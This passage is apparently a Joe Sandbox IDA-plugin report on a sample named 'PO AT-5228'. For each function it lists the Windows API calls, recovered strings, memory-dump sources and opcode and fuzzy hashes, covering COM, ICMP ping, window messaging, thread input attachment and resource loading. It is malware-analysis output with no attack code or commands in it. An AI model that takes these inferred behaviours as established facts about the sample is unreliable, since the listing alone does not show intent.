                                                                                        • Opcode ID: 35144d7a6885523f0a3ef75b28bb22ba0f4a3a6ba1af96dd703b187d2b430d25
                                                                                        • Instruction ID: da9cf3cc203451c8efdfe07105997886df2ce3600cf29046a3797f3016197244
                                                                                        • Opcode Fuzzy Hash: 35144d7a6885523f0a3ef75b28bb22ba0f4a3a6ba1af96dd703b187d2b430d25
                                                                                        • Instruction Fuzzy Hash: AF616B75900248AFEB20DFA4CC85FEE77F8EB09714F1441A9FA05E72A1D770A946DB50
                                                                                        APIs
                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 00B994FE
                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 00B99549
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B9955B
                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 00B9957B
                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 00B995BE
                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 00B995D2
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B995E7
                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 00B995F4
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B995FD
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B9960F
                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00B9961A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                        • String ID:
                                                                                        • API String ID: 2706829360-0
                                                                                        • Opcode ID: 441044d758ba8a86697b089120964ee3d5d0f3c47918a88a05e98727c8833660
                                                                                        • Instruction ID: c1414c7a5875d652621a87e8bd402ae926aec40efeca81559dcf92428f476bc1
                                                                                        • Opcode Fuzzy Hash: 441044d758ba8a86697b089120964ee3d5d0f3c47918a88a05e98727c8833660
                                                                                        • Instruction Fuzzy Hash: 41412E31900219AFCF01EFA8D8849DEBBB9FF18354F0180A9E515E7261DB71EA45CBA1
                                                                                        APIs
                                                                                          • Part of subcall function 00B6936C: __swprintf.LIBCMT ref: 00B693AB
                                                                                          • Part of subcall function 00B6936C: __itow.LIBCMT ref: 00B693DF
                                                                                        • CoInitialize.OLE32 ref: 00BBADF6
                                                                                        • CoUninitialize.OLE32 ref: 00BBAE01
                                                                                        • CoCreateInstance.OLE32(?,00000000,00000017,00BED8FC,?), ref: 00BBAE61
                                                                                        • IIDFromString.OLE32(?,?), ref: 00BBAED4
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BBAF6E
                                                                                        • VariantClear.OLEAUT32(?), ref: 00BBAFCF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                        • API String ID: 834269672-1287834457
                                                                                        • Opcode ID: e510a0d63d1ace6b0210d0a2753683ed1917c6ddb17c808f7b7d4812d689eddf
                                                                                        • Instruction ID: 5e08d3d0fcd0d6be4c02d00ff5b60c27b3de3712cde156d5e6f5c0dea686b1c2
                                                                                        • Opcode Fuzzy Hash: e510a0d63d1ace6b0210d0a2753683ed1917c6ddb17c808f7b7d4812d689eddf
                                                                                        • Instruction Fuzzy Hash: F0617971A08301AFD710DF54C888BBABBE8EF49714F144899F9859B291C7B0ED44CB93
                                                                                        APIs
                                                                                        • WSAStartup.WSOCK32(00000101,?), ref: 00BB8168
                                                                                        • inet_addr.WSOCK32(?,?,?), ref: 00BB81AD
                                                                                        • gethostbyname.WSOCK32(?), ref: 00BB81B9
                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00BB81C7
                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB8237
                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00BB824D
                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 00BB82C2
                                                                                        • WSACleanup.WSOCK32 ref: 00BB82C8
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                        • String ID: Ping
                                                                                        • API String ID: 1028309954-2246546115
                                                                                        • Opcode ID: 5e3c68b52fffca641bf6382017c2ce0f21c045f546c9f87ad1a8e8b703f109cb
                                                                                        • Instruction ID: 9409a8ecd7af8e79219c975bf6bf295034cc236f2921da5c9c2adfb749335f4c
                                                                                        • Opcode Fuzzy Hash: 5e3c68b52fffca641bf6382017c2ce0f21c045f546c9f87ad1a8e8b703f109cb
                                                                                        • Instruction Fuzzy Hash: 555181316046009FD7119F64DC85BBABBE9EF48310F0489A9F959EB2A1DFB4ED05CB42
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 00BAE396
                                                                                        • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00BAE40C
                                                                                        • GetLastError.KERNEL32 ref: 00BAE416
                                                                                        • SetErrorMode.KERNEL32(00000000,READY), ref: 00BAE483
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                        • API String ID: 4194297153-14809454
                                                                                        • Opcode ID: ec66c2ded2795397447dbd827f060533a8d7c1a7a22ffbec003e2b719023fbad
                                                                                        • Instruction ID: c672eb9f4b68c3134f948b56dddcecbcc72db30c4ca1d4c6eff5db2fecb38213
                                                                                        • Opcode Fuzzy Hash: ec66c2ded2795397447dbd827f060533a8d7c1a7a22ffbec003e2b719023fbad
                                                                                        • Instruction Fuzzy Hash: 1F319035A042099FDB01EB68C895ABDBBF8EF0A304F1480A5E515EB391DF70DA42CB91
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00B9B98C
                                                                                        • GetDlgCtrlID.USER32 ref: 00B9B997
                                                                                        • GetParent.USER32 ref: 00B9B9B3
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B9B9B6
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B9B9BF
                                                                                        • GetParent.USER32(?), ref: 00B9B9DB
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B9B9DE
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: 3cf4da28855e5e5284e3401991cb8163d3c18b59f01e9207097eec3425a51a3a
                                                                                        • Instruction ID: 4b06960757b263eb3848ec3e01318a63e289696fa3a551a4191f6c0b93d7f4e3
                                                                                        • Opcode Fuzzy Hash: 3cf4da28855e5e5284e3401991cb8163d3c18b59f01e9207097eec3425a51a3a
                                                                                        • Instruction Fuzzy Hash: 5921A174900108AFDF04ABA4DCC6EFEBBB5EF4A300B100169F661972A1DBB958159B20
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 00B9BA73
                                                                                        • GetDlgCtrlID.USER32 ref: 00B9BA7E
                                                                                        • GetParent.USER32 ref: 00B9BA9A
                                                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00B9BA9D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 00B9BAA6
                                                                                        • GetParent.USER32(?), ref: 00B9BAC2
                                                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00B9BAC5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$CtrlParent
                                                                                        • String ID: ComboBox$ListBox
                                                                                        • API String ID: 1383977212-1403004172
                                                                                        • Opcode ID: a5b949477ec4608496cafd2344c9decef21d04093bc5a0f6b43169e6488ee80e
                                                                                        • Instruction ID: 60356d6990210c55b4d46d841674e7393cd4f1a8e24c03e036ba2c55ff3f332c
                                                                                        • Opcode Fuzzy Hash: a5b949477ec4608496cafd2344c9decef21d04093bc5a0f6b43169e6488ee80e
                                                                                        • Instruction Fuzzy Hash: CA21C2B4A00108BFDF00ABA4DC85EFEBBB9EF45300F100165F551A71A1DFB95919AB20
                                                                                        APIs
                                                                                        • GetParent.USER32 ref: 00B9BAE3
                                                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00B9BAF8
                                                                                        • _wcscmp.LIBCMT ref: 00B9BB0A
                                                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00B9BB85
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                        • API String ID: 1704125052-3381328864
                                                                                        • Opcode ID: baba95a35e88e07f8f57bd24f078e00a596a33346160e4a9756cf8060fec7694
                                                                                        • Instruction ID: ea335c710df48db851db3d1af2431e93b4d67f3006b1e104a69f2c3e545d0866
                                                                                        • Opcode Fuzzy Hash: baba95a35e88e07f8f57bd24f078e00a596a33346160e4a9756cf8060fec7694
                                                                                        • Instruction Fuzzy Hash: 1511067A648307FEFE247624FC46DE637DCDF12764B2000B2FA04E50E5EFA16861A614
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(?), ref: 00BBB2D5
                                                                                        • CoInitialize.OLE32(00000000), ref: 00BBB302
                                                                                        • CoUninitialize.OLE32 ref: 00BBB30C
                                                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00BBB40C
                                                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00BBB539
                                                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 00BBB56D
                                                                                        • CoGetObject.OLE32(?,00000000,00BED91C,?), ref: 00BBB590
                                                                                        • SetErrorMode.KERNEL32(00000000), ref: 00BBB5A3
                                                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00BBB623
                                                                                        • VariantClear.OLEAUT32(00BED91C), ref: 00BBB633
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                        • String ID:
                                                                                        • API String ID: 2395222682-0
                                                                                        • Opcode ID: c8fb0c038d02fc3fbdefa1207eda76e763cabc180b418966deafbd3857905cd4
                                                                                        • Instruction ID: 71f194046182b23f972a40f5bbcfa1a8c1973ba05817782a218786608d78b1c2
                                                                                        • Opcode Fuzzy Hash: c8fb0c038d02fc3fbdefa1207eda76e763cabc180b418966deafbd3857905cd4
                                                                                        • Instruction Fuzzy Hash: 0FC10371608345AFCB00DF69C894D6AB7E9FF88304F0449ADF58A9B251DBB1ED05CB52
                                                                                        APIs
                                                                                        • __lock.LIBCMT ref: 00B8ACC1
                                                                                          • Part of subcall function 00B87CF4: __mtinitlocknum.LIBCMT ref: 00B87D06
                                                                                          • Part of subcall function 00B87CF4: EnterCriticalSection.KERNEL32(00000000,?,00B87ADD,0000000D), ref: 00B87D1F
                                                                                        • __calloc_crt.LIBCMT ref: 00B8ACD2
                                                                                          • Part of subcall function 00B86986: __calloc_impl.LIBCMT ref: 00B86995
                                                                                          • Part of subcall function 00B86986: Sleep.KERNEL32(00000000,000003BC,00B7F507,?,0000000E), ref: 00B869AC
                                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00B8ACED
                                                                                        • GetStartupInfoW.KERNEL32(?,00C16E28,00000064,00B85E91,00C16C70,00000014), ref: 00B8AD46
                                                                                        • __calloc_crt.LIBCMT ref: 00B8AD91
                                                                                        • GetFileType.KERNEL32(00000001), ref: 00B8ADD8
                                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00B8AE11
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                        • String ID:
                                                                                        • API String ID: 1426640281-0
                                                                                        • Opcode ID: 947c15b384eeba8abc4d450fd6536dc83262316c9f8a4805585dc8dd86933191
                                                                                        • Instruction ID: 956f39d34b7ac8f77adfd89c0e4bff57325fd2eb41f0c24bfcc48e51158f1796
                                                                                        • Opcode Fuzzy Hash: 947c15b384eeba8abc4d450fd6536dc83262316c9f8a4805585dc8dd86933191
                                                                                        • Instruction Fuzzy Hash: 9481D8719053458FEB24EF68C8806ADBBF0EF05325B2446AED4A6EB3E1D7349843CB55
                                                                                        APIs
                                                                                        • __swprintf.LIBCMT ref: 00BA67FD
                                                                                        • __swprintf.LIBCMT ref: 00BA680A
                                                                                          • Part of subcall function 00B8172B: __woutput_l.LIBCMT ref: 00B81784
                                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00BA6834
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00BA6840
                                                                                        • LockResource.KERNEL32(00000000), ref: 00BA684D
                                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00BA686D
                                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00BA687F
                                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00BA688E
                                                                                        • LockResource.KERNEL32(?), ref: 00BA689A
                                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00BA68F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                                        • String ID:
                                                                                        • API String ID: 1433390588-0
                                                                                        • Opcode ID: 618c92c99f399727ed2437007936003796be4eb06f3adf97f85e38cbbd7e4596
                                                                                        • Instruction ID: 750776ce02e07330876014457a6c867c79b566c5a5af92f016449575d88e1da5
                                                                                        • Opcode Fuzzy Hash: 618c92c99f399727ed2437007936003796be4eb06f3adf97f85e38cbbd7e4596
                                                                                        • Instruction Fuzzy Hash: 88318EB190425AABDB109F60DD85ABF7BECEF09340B088466FA12D7150EB78D911DB70
                                                                                        APIs
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00BA4047
                                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA405B
                                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00BA4062
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4071
                                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00BA4083
                                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA409C
                                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA40AE
                                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA40F3
                                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4108
                                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00BA30A5,?,00000001), ref: 00BA4113
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                        • String ID:
                                                                                        • API String ID: 2156557900-0
                                                                                        • Opcode ID: 16523ffd120eb2a7f100a08aff9f8323db165b451d33275b71ed5f5d35fc6743
                                                                                        • Instruction ID: 6917f22bd8d7b9cd7fad174aec57463ac933d0768d0380049c0c3797183e36d5
                                                                                        • Opcode Fuzzy Hash: 16523ffd120eb2a7f100a08aff9f8323db165b451d33275b71ed5f5d35fc6743
                                                                                        • Instruction Fuzzy Hash: 0931C171514244AFDB21DF58DC86B6D7BE9FBA2311F10824AF904EB290CBF99D818B60
                                                                                        APIs
                                                                                        • EnumChildWindows.USER32(?,00B9CF50), ref: 00B9CE90
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: ChildEnumWindows
                                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                                        • API String ID: 3555792229-1603158881
                                                                                        • Opcode ID: 508be323b01103b898378b1b6b833151da68f503f893b42ee7e27387d5110587
                                                                                        • Instruction ID: 3cf822f9364c4341a0932c53f3c7a3080c09c74ffaa96265192ee279f7227d57
                                                                                        • Opcode Fuzzy Hash: 508be323b01103b898378b1b6b833151da68f503f893b42ee7e27387d5110587
                                                                                        • Instruction Fuzzy Hash: ED915E74A04506ABCF18DF64C481BEAFFF9FF05300F5085A9E45AA7151DF30A99ADBA0
                                                                                        APIs
                                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00B630DC
                                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00B63181
                                                                                        • UnregisterHotKey.USER32(?), ref: 00B632A9
                                                                                        • DestroyWindow.USER32(?), ref: 00BD5079
                                                                                        • FreeLibrary.KERNEL32(?), ref: 00BD50F8
                                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00BD5125
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1690919363.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1690319384.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691386548.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1691890939.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1692282558.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_b60000_PO AT-5228.jbxd
                                                                                        Similarity
                                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                        • String ID: close all
                                                                                        • API String ID: 469580280-3243417748
                                                                                        • Opcode ID: ec3016a9436f826c523466731542f7ef618efef9ea3ac8f2286af61b692c2869
                                                                                        • Instruction ID: 428b0bf0a34f06e3462539aadd58456fa6518cee5d0a80cc888a94c9d9e9d8d9
                                                                                        • Opcode Fuzzy Hash: ec3016a9436f826c523466731542f7ef618efef9ea3ac8f2286af61b692c2869
                                                                                        • Instruction Fuzzy Hash: 0F91F6746002468FC715EF24C895A68F3E4FF15704F5482E9E50AAB2A2DF38AE5ACF54
                                                                                        APIs
                                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00B7CC15
                                                                                          • Part of subcall function 00B7CCCD: GetClientRect.USER32(?,?), ref: 00B7CCF6
                                                                                          • Part of subcall function 00B7CCCD: GetWindowRect.USER32(?,?), ref: 00B7CD37
                                                                                          • Part of subcall function 00B7CCCD: ScreenToClient.USER32(?,?), ref: 00B7CD5F
                                                                                        • GetDC.USER32 ref: 00BDD137
                                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00BDD14A
                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00BDD158
